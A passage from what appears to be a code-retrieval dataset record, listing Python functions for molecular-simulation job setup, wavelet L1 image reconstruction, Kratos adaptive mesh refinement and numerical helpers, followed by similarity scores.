[y]es: \")\n mu.mkdir(directory)\n\n # create README.md\n IPI_COMMAND = os.environ[\"IPI_COMMAND\"]\n LAMMPS_COMMAND = os.environ[\"LAMMPS_COMMAND\"]\n mu.create_READMEtxt(directory,add=[\"# to start manually (1): python \"+IPI_COMMAND+\" input-runner.xml\",\"# to start manually (2):\"+LAMMPS_COMMAND+\" < in.lmp\"])\n\n for seed in seeds:\n\n # make jobdirectory\n jobdir = directory+'/seed'+str(seed)\n print('jobdir',jobdir)\n if os.path.exists(jobdir):\n sys.exit(\"jobdirectory \"+str(jobdir)+\" already exists!\")\n mu.mkdir(jobdir)\n\n # get data.lmp and data.ipi\n atomsc.write(jobdir+'/data.runnerformat.lmp',format='lammps-runner')\n atomsc_fakevac.write(jobdir+'/data.ipi',format='ipi')\n atomsc_fakevac.write(jobdir+'/data.extxyz',format='extxyz')\n #atomsc_fakevac.write(jobdir+'/data_fakevac.ipi',format='ipi')\n\n if testfiles == True:\n atomsc.write(jobdir+'/data.lmp',format='lammps-data')\n atomsc.write(jobdir+'/data.POSCAR',format='vasp')\n atomsc.write(jobdir+'/data.xyz',format='xyz')\n atomsc.write(jobdir+'/data.extxyz',format='extxyz')\n atomsc.write(jobdir+'/data.espresso-in',format='espresso-in')\n\n # create in.lmp\n ace = mu.ase_calculate_ene(pot=pot,potpath=mypot.potpath,\n units='eV',geopt=False,kmc=True,verbose=verbose)\n address = socket.gethostname()+\"_\"+os.path.basename(jobdir)\n print('address',address)\n ace.pot_get_and_ase_lmp_cmd(kmc=True,temp=temp,nsteps=nsteps,ffsocket=ffsocket,address=address)\n mu.lammps_write_inputfile(folder=jobdir,filename='in.lmp',positions='data.runnerformat.lmp',ace=ace)\n\n # create input-runner.xml (should be made without copying)\n mu.create_ipi_kmc_inputfile(jobdir,filename=\"input-runner.xml\",nsteps=nsteps,stride=100,seed=seed,a0=a0,ncell=ncell,nsi=nsi,nmg=nmg,nvac=nvac,neval=neval,temp=temp,nodes=nodes,address=address,testrun=test,cubic=args.cubic)\n\n # create submit-ipi-kmc.sh (should be made without copying)\n mu.create_submitskript_ipi_kmc(jobdir+\"/submit-ipi-kmc.sh\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=True)\n\n # create osubmit-ipi-kmc.sh (should be made without copying)\n mu.create_submitskript_ipi_kmc(jobdir+\"/osubmit-ipi-kmc.sh\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=False)\n\n # submit the job (execute either this or submit-ipi-kmc.sh_all3, not both)\n #mu.submitjob(submit=submit,submitdebug=submitdebug,jobdir=jobdir,submitskript=\"submit-ipi-kmc.sh\")\n\n # get submit-ipi-kmc.sh_all3 (should be made without copying)\n if nseeds == 3:\n mu.create_submitskript_ipi_kmc(directory+\"/submit-ipi-kmc.sh_all3\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=True,\n LOOPFOLDER=True)\n\n # submit the job (execute either this or submit-ipi-kmc.sh_all3, not both)\n #mu.submitjob(submit=submit,submitdebug=submitdebug,jobdir=directory,submitskript=\"submit-ipi-kmc.sh_all3\")\n if submit == True:\n mu.submitjob(submit_to_que=True,submit_to_debug_que=False,jobdir=directory,submitskript=\"submit-ipi-kmc.sh_all3\")\n\n\n print('done')\n return", "def solve_l1(y, A_fun, AT_fun, lambda_l1, reshape_img_fun, show_img_progress=False, alpha=0.2, max_iter=100, solver_tol=1e-6):\n\n\n obj_lss = np.zeros(max_iter)\n x_zs = np.zeros(max_iter)\n u_norms = np.zeros(max_iter)\n times = np.zeros(max_iter)\n\n ATy = AT_fun(y)\n x_shape = ATy.shape\n d = np.prod(x_shape)\n\n def A_cgs_fun(x):\n x = np.reshape(x, 
x_shape, order='F')\n y = AT_fun(A_fun(x)) + alpha * x\n return vec(y)\n A_cgs = LinearOperator((d,d), matvec=A_cgs_fun, dtype='float')\n\n def compute_p_inv_A(b, z0):\n (z,info) = sp.sparse.linalg.cgs(A_cgs, vec(b), x0=vec(z0), tol=1e-3, maxiter=100)\n if info > 0:\n print('cgs convergence to tolerance not achieved')\n elif info <0:\n print('cgs gets illegal input or breakdown')\n z = np.reshape(z, x_shape, order='F')\n return z\n\n\n def A_cgs_fun_init(x):\n x = np.reshape(x, x_shape, order='F')\n y = AT_fun(A_fun(x))\n return vec(y)\n A_cgs_init = LinearOperator((d,d), matvec=A_cgs_fun_init, dtype='float')\n\n def compute_init(b, z0):\n (z,info) = sp.sparse.linalg.cgs(A_cgs_init, vec(b), x0=vec(z0), tol=1e-2)\n if info > 0:\n print('cgs convergence to tolerance not achieved')\n elif info <0:\n print('cgs gets illegal input or breakdown')\n z = np.reshape(z, x_shape, order='F')\n return z\n\n # initialize z and u\n z = compute_init(ATy, ATy)\n u = np.zeros(x_shape)\n\n\n plot_normalozer = matplotlib.colors.Normalize(vmin=0.0, vmax=1.0, clip=True)\n\n\n start_time = timeit.default_timer()\n\n for iter in range(max_iter):\n\n # x-update\n net_input = z+u\n Wzu, wbook = wavelet_transform(net_input)\n q = soft_threshold(Wzu, lambda_l1/alpha)\n x = inverse_wavelet_transform(q, wbook, x_shape)\n x = np.reshape(x, x_shape)\n\n # z-update\n b = ATy + alpha * (x - u)\n z = compute_p_inv_A(b, z)\n\n # u-update\n u += z - x;\n\n if show_img_progress == True:\n\n fig = plt.figure('current_sol')\n plt.gcf().clear()\n fig.canvas.set_window_title('iter %d' % iter)\n plt.subplot(1,3,1)\n plt.imshow(reshape_img_fun(np.clip(x, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('x')\n plt.subplot(1,3,2)\n plt.imshow(reshape_img_fun(np.clip(z, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('z')\n plt.subplot(1,3,3)\n plt.imshow(reshape_img_fun(np.clip(net_input, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('netin')\n plt.pause(0.00001)\n\n\n obj_ls = 0.5 * np.sum(np.square(y - A_fun(x)))\n x_z = np.sqrt(np.mean(np.square(x-z)))\n u_norm = np.sqrt(np.mean(np.square(u)))\n\n print('iter = %d: obj_ls = %.3e |x-z| = %.3e u_norm = %.3e' % (iter, obj_ls, x_z, u_norm))\n\n\n obj_lss[iter] = obj_ls\n x_zs[iter] = x_z\n u_norms[iter] = u_norm\n times[iter] = timeit.default_timer() - start_time\n\n if x_z < solver_tol:\n break\n\n infos = {'obj_lss': obj_lss, 'x_zs': x_zs, 'u_norms': u_norms,\n 'times': times, 'alpha':alpha, 'lambda_l1':lambda_l1,\n 'max_iter':max_iter, 'solver_tol':solver_tol}\n\n\n return (x, z, u, infos)", "def ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(current_global_index,pickled_coarse_model,pickled_coarse_project_parameters,pickled_custom_metric_refinement_parameters,pickled_custom_remesh_refinement_parameters,random_variable,current_index,current_analysis_stage,previous_computational_time,open_mp_threads,mapping_flag,pickled_mapping_reference_model,print_to_file,filename):\n\n start_time = time.time()\n # unpickle model and build Kratos Model object\n serialized_model = pickle.loads(pickled_coarse_model)\n current_model = KratosMultiphysics.Model()\n serialized_model.Load(\"ModelSerialization\",current_model)\n del(serialized_model)\n # unpickle parameters and build Kratos Parameters object\n serialized_project_parameters = pickle.loads(pickled_coarse_project_parameters)\n current_project_parameters = KratosMultiphysics.Parameters()\n 
serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n del(serialized_project_parameters)\n # refine if current current_global_index > 0, adaptive refinement based on the solution of previous index\n if (current_index > 0):\n # unpickle metric and remesh refinement parameters and build Kratos Parameters objects\n serialized_custom_metric_refinement_parameters = pickle.loads(pickled_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters = pickle.loads(pickled_custom_remesh_refinement_parameters)\n current_custom_metric_refinement_parameters = KratosMultiphysics.Parameters()\n current_custom_remesh_refinement_parameters = KratosMultiphysics.Parameters()\n serialized_custom_metric_refinement_parameters.Load(\"MetricRefinementParametersSerialization\",current_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters.Load(\"RemeshRefinementParametersSerialization\",current_custom_remesh_refinement_parameters)\n del(serialized_custom_metric_refinement_parameters,serialized_custom_remesh_refinement_parameters)\n # refine the model Kratos object\n adaptive_refinement_manager = AdaptiveRefinement(current_index,current_model,current_project_parameters,current_custom_metric_refinement_parameters,current_custom_remesh_refinement_parameters)\n refined_model,refined_project_parameters = adaptive_refinement_manager.ComputeAdaptiveRefinement()\n current_model = refined_model\n del(refined_model,refined_project_parameters)\n # constructor analysis stage\n simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n # add filename flag print_to_file is true\n if (print_to_file):\n simulation.filename = filename\n # add flag if current index is maximum index\n if (current_index == current_global_index):\n simulation.is_current_index_maximum_index = True\n else:\n simulation.is_current_index_maximum_index = False\n # mapping if in current finest level and mapping flag is true\n # otherwise standard behavior\n if (mapping_flag is True and current_index == current_global_index):\n # unpickle mapping reference model and build Kratos Model object\n serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n mapping_reference_model = KratosMultiphysics.Model()\n serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n del(serialized_mapping_reference_model)\n # send reference model to analysis stage for mapping and set mapping flag to true\n simulation.mapping_reference_model = mapping_reference_model\n simulation.mapping = True\n simulation.Run()\n # mapping if in current finest level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True and current_index == current_global_index):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n # save model and parameters as MpiSerializer Kratos objects\n serialized_finer_model = KratosMultiphysics.MpiSerializer()\n serialized_finer_model.Save(\"ModelSerialization\",simulation.model)\n # pickle model and parameters\n pickled_finer_model = pickle.dumps(serialized_finer_model, 2) # second argument is the protocol and is NECESSARY (according to pybind11 docs)\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return 
qoi,pickled_finer_model,computational_time", "def parallelized_threading(name, dico_aligns, dope_arr, index_aa):\n ev_threading = sc.Threading(dico_aligns[name])\n return (name, ev_threading.threaded(dope_arr, index_aa))", "def reduce_nb(a, reduce_func_nb, *args):\n out = np.full(a.shape[1], np.nan, dtype=np.float_)\n\n for col in range(a.shape[1]):\n out[col] = reduce_func_nb(col, a[:, col], *args)\n return out" ]
[ "0.65683377", "0.61231744", "0.61210066", "0.58272725", "0.58008033", "0.57025033", "0.56774867", "0.565421", "0.5610815", "0.5579183", "0.5561648", "0.5541063", "0.552428", "0.54533285", "0.5434301", "0.5418918", "0.5369601", "0.5330608", "0.52911884", "0.5281962", "0.5195514", "0.51942545", "0.5192588", "0.5172473", "0.5143275", "0.5107227", "0.5086616", "0.50838035", "0.50819606", "0.5070131", "0.50480384", "0.50349545", "0.5023571", "0.4985677", "0.49501696", "0.49332353", "0.489361", "0.4874437", "0.4874437", "0.48727936", "0.4854548", "0.48459977", "0.48438382", "0.4828254", "0.48235548", "0.4817116", "0.48142642", "0.48078787", "0.48063615", "0.47954836", "0.47952983", "0.4779901", "0.47657928", "0.47614145", "0.47402304", "0.47285813", "0.4727023", "0.47232905", "0.47220314", "0.47200912", "0.4702508", "0.4702322", "0.46876773", "0.4683725", "0.46806893", "0.46769854", "0.46747023", "0.46669236", "0.4656495", "0.4646575", "0.4645698", "0.4644609", "0.4640612", "0.46382976", "0.46382555", "0.46347043", "0.46222973", "0.4621476", "0.46167004", "0.46151206", "0.4613143", "0.4613047", "0.4610823", "0.46081734", "0.46072897", "0.4606967", "0.4606649", "0.46056393", "0.46050113", "0.45878655", "0.45859998", "0.45846683", "0.45830503", "0.45798513", "0.4577831", "0.4576468", "0.45697027", "0.45663613", "0.45614323", "0.4560821", "0.45588028" ]
0.0
-1
Computes sequence similarity based on a substitution matrix. Requires that the sequences are pre-aligned and of equal length. Operates on strings and a dict substitution matrix.
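For reference, when as_similarity=False the document below folds the raw score into a distance using the standard inner-product-to-squared-distance identity (notation introduced here only for this note, with s(x, y) the summed substitution score of the aligned pair):

    D(x, y) = s(x, x) + s(y, y) - 2\, s(x, y)

so identical sequences land at D = 0, and D grows as the cross-score falls below the two self-scores.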
def _nb_subst_metric(seq1, seq2, subst_dict, as_similarity=False):
    """Site-wise similarity between seq1 and seq2 using the substitution
    matrix subst_dict, returned as a distance unless as_similarity=True."""
    assert len(seq1) == len(seq2)

    def _sim_func(s1, s2, subst):
        # Sum the substitution score over every aligned position. Keys are
        # 'X|Y' residue pairs; the reversed key is tried before falling back
        # to the matrix's default entry 'n|a'.
        sim12 = 0.
        for i in range(len(s1)):
            k1 = s1[i] + '|' + s2[i]
            k2 = s2[i] + '|' + s1[i]
            sim12 += subst.get(k1, subst.get(k2, subst['n|a']))
        return sim12

    sim12 = _sim_func(seq1, seq2, subst_dict)
    if as_similarity:
        return sim12
    # Convert to a distance so identical sequences score 0:
    # D = s(x,x) + s(y,y) - 2*s(x,y).
    sim11 = _sim_func(seq1, seq1, subst_dict)
    sim22 = _sim_func(seq2, seq2, subst_dict)
    return sim11 + sim22 - 2 * sim12
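As a quick illustration of how _nb_subst_metric behaves, here is a minimal usage sketch. The toy matrix, its scores, and the example sequences are invented for this note and are not part of the dataset; the only conventions taken from the code are the 'X|Y' key format and the 'n|a' default entry. The _nb_ prefix hints that the original may be numba-jitted in its home codebase (a guess); the sketch calls it as plain Python, which behaves identically on ordinary dicts.

# Hypothetical toy substitution matrix (values invented for illustration).
toy_subst = {
    'A|A': 4.0,
    'R|R': 5.0,
    'A|R': -1.0,   # 'R|A' resolves to this via the reversed-key fallback
    'n|a': -2.0,   # default score for any pair missing from the matrix
}

# Raw similarity: per-site scores A|A + A|A + R|R = 4 + 4 + 5.
assert _nb_subst_metric('AAR', 'AAR', toy_subst, as_similarity=True) == 13.0

# Distance form: s('AAR','ARA') = 4 - 1 - 1 = 2, so D = 13 + 13 - 2*2 = 22.
assert _nb_subst_metric('AAR', 'ARA', toy_subst) == 22.0

# Identical sequences are always at distance zero.
assert _nb_subst_metric('AAR', 'AAR', toy_subst) == 0.0

The asserts make the sketch self-checking. Note that D behaves like a squared distance and is only guaranteed to induce a proper metric when the score matrix is a positive semi-definite kernel, which a toy dict like this does not ensure.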
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ComputeDistMatrix(dict_alignedSequences):\r\n \r\n # check if dictionary with keys as tuples containing integers and values as tuples containing strings\r\n check = True \r\n #1 Check Input is dict\r\n if isinstance(dict_alignedSequences, dict) == False:\r\n check = False\r\n \r\n #2 Check are the keys and values tuples. Do the keys only contain integers and the vlaues only strings\r\n i = 0\r\n while len(dict_alignedSequences) > i:\r\n #checking for keys and values as tuples\r\n if isinstance(list(dict_alignedSequences.keys())[i], tuple) == False or isinstance(list(dict_alignedSequences.values())[i], tuple) == False:\r\n check = False\r\n break\r\n #checking keys for integers\r\n if isinstance(list(dict_alignedSequences.keys())[i][0], int) == False or isinstance(list(dict_alignedSequences.keys())[i][1], int) == False:\r\n check = False\r\n break\r\n #checking values for strings\r\n if isinstance(list(dict_alignedSequences.values())[i][0], str) == False or isinstance(list(dict_alignedSequences.values())[i][1], str) == False:\r\n check = False\r\n break\r\n \r\n #increment the counter for while loop\r\n i += 1\r\n \r\n #3 Check sequences contain aligned DNA and are of equal length\r\n for key in dict_alignedSequences:\r\n if is_aligned_dna(dict_alignedSequences[key][0]) == False or is_aligned_dna(dict_alignedSequences[key][1]) == False:\r\n check = False\r\n break\r\n if len(dict_alignedSequences[key][0]) != len(dict_alignedSequences[key][1]):\r\n check = False\r\n break\r\n \r\n #final evalauation if data is usable\r\n if check == False:\r\n raise TypeError ('malformed input')\r\n \r\n #get number of sequences\r\n matrixdim = howmany_sequences(dict_alignedSequences)\r\n #initialize dist matrix\r\n distMatrix = init_Dist_Matrix(matrixdim)\r\n \r\n \r\n for i in dict_alignedSequences.keys():\r\n # useing the key i to get the corisponding aligned sequences \r\n seq = dict_alignedSequences[i]\r\n #calculate distances between the sequences\r\n distance = calculate_distance(seq[0],seq[1])\r\n #markdown result at the corrsiponding place in the distmatrix\r\n distMatrix[i[0]][i[1]] = distance\r\n distMatrix[i[1]][i[0]] = distance\r\n \r\n return(distMatrix)", "def seq_align(string1,string2,mismatch_penalty,gap_penalty):\n\n # define 2x2 matrix\n matrix = []\n for i in range(len(string1)+1):\n if i == 0:\n matrix.append(list([gap_penalty * x for x in range(len(string2)+1)]))\n else:\n matrix.append(list([gap_penalty * i if x == 0 else None for x in range(len(string2)+1)]))\n\n # populate matrix by looping through the strings and finding optimal value for each spot\n for i in range(len(string1)):\n for j in range(len(string2)):\n if string1[i] == string2[j]:\n val1 = 0 + matrix[i][j]\n else:\n val1 = mismatch_penalty + matrix[i][j]\n val2 = gap_penalty + matrix[i][j+1]\n val3 = gap_penalty + matrix[i+1][j]\n min_val = min(val1,val2,val3)\n matrix[i+1][j+1] = min_val\n\n\n # define values to use while retracing\n result_str1 = ''\n result_str2 = ''\n i = len(matrix)-1\n j = len(matrix[0])-1\n\n # trace through matrix to find the optimal character alignment\n while i > 0 and j > 0:\n val1 = matrix[i-1][j-1]\n val2 = matrix[i-1][j]\n val3 = matrix[i][j-1]\n min_val = min(val1,val2,val3)\n if val1 == min_val:\n result_str1 += string1[i-1]\n result_str2 += string2[j-1]\n i -= 1\n j -= 1\n elif val2 == min_val:\n result_str1 += \"-\"\n result_str2 += string2[j-1]\n i -= 1\n else:\n result_str1 += string1[i-1]\n result_str2 += \"-\"\n j -= 1\n\n # for any leftover j values\n if i == 0:\n while j > 
0:\n result_str1 += '-'\n result_str2 += string2[j]\n j -=1\n\n # for any leftover i values\n if j == 0:\n while i > 0:\n result_str1 += string1[i]\n result_str2 += \"-\"\n i -= 1\n\n return matrix[len(matrix)-1][len(matrix[0])-1], result_str1[::-1], result_str2[::-1]", "def affine(s1, s2):\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.Affine()\n\n # if not isinstance(s1, six.string_types):\n # s1 = six.u(str(s1))\n #\n # if isinstance(s1, bytes):\n # s1 = s1.decode('utf-8', 'ignore')\n #\n # if not isinstance(s2, six.string_types):\n # s2 = six.u(str(s2))\n #\n # if isinstance(s2, bytes):\n # s2 = s2.decode('utf-8', 'ignore')\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the similarity\n return measure.get_raw_score(s1, s2)", "def optimal_string_alignment_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(optimal_string_alignment_distance(s1, s2)) / max_cost", "def string_similarity(a, b):\n return SequenceMatcher(a=a, b=b).ratio()", "def string_similarity(item_1, item_2):\n return SequenceMatcher(None, item_1.lower(), item_2.lower()).ratio()", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def wordSimilarityRatio(sent_1,sent_2):", "def string_similarity_score(left: str, right: str):\n return SequenceMatcher(None, left, right).ratio()", "def similarity_transformation(rot, mat):\n return np.dot(rot, np.dot(mat, np.linalg.inv(rot)))", "def similarity_transformation(rot, mat):\n return np.dot(rot, np.dot(mat, np.linalg.inv(rot)))", "def sequence_align(string_v, string_w):\n m = len(string_v)\n n = len(string_w)\n\n # Initialization; D[i][j][0] contains the max alignment score of the\n # ith prefix of v and the jth of w; D[i][j][1] contains the back pointer.\n D = [[(0, START) for _ in range(n + 1)] for _ in range(m + 1)]\n\n for i in range(1, m + 1):\n D[i][0] = (D[i - 1][0][0] + blosum['-', string_v[i - 1]], DELETE)\n\n for j in range(1, n + 1):\n D[0][j] = (D[0][j - 1][0] + blosum['-', string_w[j - 1]], INSERT)\n\n # Recurrence\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n insert = D[i][j-1][0] + blosum['-', string_w[j - 1]]\n delete = D[i-1][j][0] + blosum[string_v[i - 1], '-']\n substitute = D[i-1][j-1][0] + blosum[string_v[i - 1], string_w[j - 1]]\n # Set D[i][j] to the max of the recurrences\n if insert > delete and insert > substitute:\n D[i][j] = (insert, INSERT)\n elif delete > substitute:\n D[i][j] = (delete, DELETE)\n else:\n D[i][j] = (substitute, SUBSTITUTE)\n\n i, j = m, n\n v_aligned = ''\n w_aligned = ''\n back_pointer = D[i][j][1]\n while back_pointer != START:\n if 
back_pointer == INSERT:\n j -= 1\n v_aligned = '-' + v_aligned\n w_aligned = string_w[j] + w_aligned\n\n \n elif back_pointer == DELETE:\n i -= 1\n v_aligned = string_v[i] + v_aligned\n w_aligned = '-' + w_aligned\n\n elif back_pointer == SUBSTITUTE:\n i -= 1\n j -= 1\n v_aligned = string_v[i] + v_aligned\n w_aligned = string_w[j] + w_aligned\n\n \n back_pointer = D[i][j][1]\n \n return v_aligned, w_aligned", "def test_similarity(self):\n self.assertTrue(np.allclose(self.vectors.similarity('dog.n.01', 'dog.n.01'), 1))\n self.assertTrue(np.allclose(self.vectors.similarity('dog.n.01', 'mammal.n.01'), 0.180901358))", "def rs1_score(sequence):\n import math\n import numpy as np\n seq = str(sequence).upper()\n seq = list(seq)\n matrix1 = np.zeros([len(sequence),4], dtype=int)\n for i,item in enumerate(sequence):\n if item == 'A':\n matrix1[i,0] = 1\n if item == 'T':\n matrix1[i,1] = 1\n if item == 'U':\n matrix1[i,1] = 1\n if item == 'C':\n matrix1[i,2] = 1\n if item == 'G':\n matrix1[i,3] = 1\n\n\n \"\"\"\n Generates a binary matrix for DNA/RNA sequence, where each column is a possible\n pair of adjacent bases, and each row is a position along the sequence.\n Matrix column order is AA, AT, AC, AG, TA, TT, TC, TG, CA, CT, CC, CG, GA, GT, GC, GG\n \"\"\"\n sequence = sequence.replace('U','T')\n pairwise_sequence = []\n for i in range(len(sequence)):\n if i < len(sequence)-1:\n basepair = sequence[i]+sequence[i+1]\n pairwise_sequence.append(basepair)\n matrix2 = np.zeros([len(pairwise_sequence),16], dtype=int)\n for i,item in enumerate(pairwise_sequence):\n if item == 'AA':\n matrix2[i,0] = 1\n if item == 'AT':\n matrix2[i,1] = 1\n if item == 'AC':\n matrix2[i,2] = 1\n if item == 'AG':\n matrix2[i,3] = 1\n if item == 'TA':\n matrix2[i,4] = 1\n if item == 'TT':\n matrix2[i,5] = 1\n if item == 'TC':\n matrix2[i,6] = 1\n if item == 'TG':\n matrix2[i,7] = 1\n if item == 'CA':\n matrix2[i,8] = 1\n if item == 'CT':\n matrix2[i,9] = 1\n if item == 'CC':\n matrix2[i,10] = 1\n if item == 'CG':\n matrix2[i,11] = 1\n if item == 'GA':\n matrix2[i,12] = 1\n if item == 'GT':\n matrix2[i,13] = 1\n if item == 'GC':\n matrix2[i,14] = 1\n if item == 'GG':\n matrix2[i,15] = 1\n\n\n \"\"\"\n Scoring matrix\n \"\"\"\n intersect = 0.59763615\n low_gc = -0.2026259\n high_gc = -0.1665878\n\n first_order = ['G02','A03','C03','C04','C05',\n 'G05','A06','C06','C07','G07',\n 'A12','A15','C15','A16','C16',\n 'T16','A17','G17','C18','G18',\n 'A19','C19','G20','T20','G21',\n 'T21','C22','T22','T23','C24',\n 'G24','T24','A25','C25','T25',\n 'G28','T28','C29','G30']\n first_scores = [-0.2753771,-0.3238875,0.17212887,-0.1006662,-0.2018029,\n 0.24595663,0.03644004,0.09837684,-0.7411813,-0.3932644,\n -0.466099,0.08537695,-0.013814,0.27262051,0.1190226,\n -0.2859442,0.09745459,-0.1755462,-0.3457955,-0.6780964,\n 0.22508903,-0.5077941,-0.4173736,-0.054307,0.37989937,\n -0.0907126,0.05782332,-0.5305673,-0.8770074,-0.8762358,\n 0.27891626,-0.4031022,-0.0773007,0.28793562,-0.2216372,\n -0.6890167,0.11787758,-0.1604453,0.38634258]\n first_order_scores = dict(zip(first_order,first_scores))\n\n second_order = ['GT02','GC05','AA06','TA06','GG07',\n 'GG12','TA12','TC12','TT12','GG13',\n 'GA14','GC14','TG17','GG19','TC19',\n 'CC20','TG20','AC21','CG21','GA21',\n 'GG21','TC22','CG23','CT23','AA24',\n 'AG24','AG25','CG25','TG25','GT27',\n 'GG29']\n second_scores = [-0.6257787,0.30004332,-0.8348362,0.76062777,-0.4908167,\n -1.5169074,0.7092612,0.49629861,-0.5868739,-0.3345637,\n 0.76384993,-0.5370252,-0.7981461,-0.6668087,0.35318325,\n 
0.74807209,-0.3672668,0.56820913,0.32907207,-0.8364568,\n -0.7822076,-1.029693,0.85619782,-0.4632077,-0.5794924,\n 0.64907554,-0.0773007,0.28793562,-0.2216372,0.11787758,\n -0.69774]\n second_order_scores = dict(zip(second_order,second_scores))\n\n\n # order 1 score matrix\n \"\"\" row order == A T/U C G \"\"\"\n first_matrix = np.zeros([4,30], dtype=float)\n def posit(key):\n return int(key[1:])-1\n for k,v in first_order_scores.items():\n if k[0] == 'A':\n first_matrix[0,posit(k)] = v\n elif k[0] == 'T':\n first_matrix[1,posit(k)] = v\n elif k[0] == 'C':\n first_matrix[2,posit(k)] = v\n elif k[0] == 'G':\n first_matrix[3,posit(k)] = v\n\n\n # order 2 score matrix\n \"\"\" row order == AA AT AC AG TA TT TC TG CA CT CC CG GA GT GC GG \"\"\"\n second_matrix = np.zeros([16,29], dtype=float)\n for k,v in second_order_scores.items():\n if k[0:2] == 'AA':\n second_matrix[0,int(k[2:])-1] = v\n if k[0:2] == 'AT':\n second_matrix[1,int(k[2:])-1] = v\n if k[0:2] == 'AC':\n second_matrix[2,int(k[2:])-1] = v\n if k[0:2] == 'AG':\n second_matrix[3,int(k[2:])-1] = v\n if k[0:2] == 'TA':\n second_matrix[4,int(k[2:])-1] = v\n if k[0:2] == 'TT':\n second_matrix[5,int(k[2:])-1] = v\n if k[0:2] == 'TC':\n second_matrix[6,int(k[2:])-1] = v\n if k[0:2] == 'TG':\n second_matrix[7,int(k[2:])-1] = v\n if k[0:2] == 'CA':\n second_matrix[8,int(k[2:])-1] = v\n if k[0:2] == 'CT':\n second_matrix[9,int(k[2:])-1] = v\n if k[0:2] == 'CC':\n second_matrix[10,int(k[2:])-1] = v\n if k[0:2] == 'CG':\n second_matrix[11,int(k[2:])-1] = v\n if k[0:2] == 'GA':\n second_matrix[12,int(k[2:])-1] = v\n if k[0:2] == 'GT':\n second_matrix[13,int(k[2:])-1] = v\n if k[0:2] == 'GC':\n second_matrix[14,int(k[2:])-1] = v\n if k[0:2] == 'GG':\n second_matrix[15,int(k[2:])-1] = v\n\n item_gc = sequence[0][5:-5]\n gc_count = item_gc.count('G') + item_gc.count('C')\n if gc_count < 10:\n gc_score = low_gc\n else:\n gc_score = high_gc\n first_first = np.matmul(first_matrix,matrix1)\n score_first = np.trace(first_first)\n score_second = np.trace(np.matmul(second_matrix,matrix2))\n score = (1/(1 + math.exp(-(intersect + gc_score + score_first + score_second))))\n return score", "def word_rotator_similarity(x, y):\n return 1 - word_rotator_distance(x, y)", "def match_score(seq1, seq2):\n\n seq1 = get_sequence_string(seq1)\n seq2 = get_sequence_string(seq2)\n score = align.localxx(seq1, seq2)[0][2]\n return score", "def word_embedding_levenshtein(seq1, seq2, embeddings, average_distance, r=0.9, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\talpha = r / ((1 - r) * average_distance)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\td.append(list(range(x2)))\n\tfor i in range(1, x1):\n\t\td.append([i] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tif(e1 == e2): c = 0\n\t\t\telse:\n\t\t\t\tv1 = embeddings[e1]\n\t\t\t\tv2 = embeddings[e2]\n\n\t\t\t\tif((v1 is None) or (v2 is None)): c = 1\n\t\t\t\telse:\n\t\t\t\t\tdst = np.linalg.norm(v1 - v2) # Distance 2 (or L2 norm of the difference)\n\n\t\t\t\t\t# Now, we need a function increasing function mapping 0 to 0 and +inf to 1\n\t\t\t\t\tc = 1 - (1 / (1 + (alpha * dst)))\n\n\t\t\t\t\t#c /= r # If you uncomment this line, the cost of a substitution at distance `average_distance` will be 1 and substitutions might have higher cost, up to 1/r. 
